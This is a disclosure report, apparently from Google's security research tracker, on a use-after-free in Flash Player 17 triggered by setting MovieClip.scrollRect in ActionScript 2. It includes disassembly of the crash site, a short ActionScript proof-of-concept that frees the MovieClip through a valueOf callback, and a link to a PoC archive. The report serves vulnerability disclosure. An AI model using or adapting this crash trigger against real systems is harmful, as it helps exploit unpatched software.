Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]
---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains
in the stack
VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]
REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.
These lines come from flashplayer standalone 17.0.0.169:
.text:00597F45 loc_597F45:
.text:00597F45 cmp eax, 6
.text:00597F48 jnz loc_597FE5
.text:00597F4E mov ecx, esi ; esi points to the MovieClip object
.text:00597F50 call sub_40C1ED
.text:00597F55 add eax, 30Ch
.text:00597F5A or dword ptr [eax], 8
.text:00597F5D mov eax, [ebx]
.text:00597F5F mov byte ptr [eax+82Ch], 1
.text:00597F66 mov ecx, [ebx]
.text:00597F68 lea eax, [ebp+74h+var_1C0]
.text:00597F6E push eax
.text:00597F6F push dword ptr [ebx+0Ch]
.text:00597F72 call xfetchRectangleProperties ; get the Rectangle properties, and execute some AS2
.text:00597F77 test al, al
.text:00597F79 jz loc_598274
.text:00597F7F mov edi, [ebp+74h+var_1C0]
.text:00597F85 mov ecx, esi
.text:00597F87 imul edi, 14h
.text:00597F8A call sub_40C1ED ; reference freed memory and return a bad
pointer
.text:00597F8F mov [eax+310h], edi ; crash here, eax = 0
Poc (compile with Flash CS5.5):
import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
_global.mc.createTextField("newtf",1,1,1,2,3)
return 7
}
var o = {x:o2,y:0,width:4,height:5}
_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip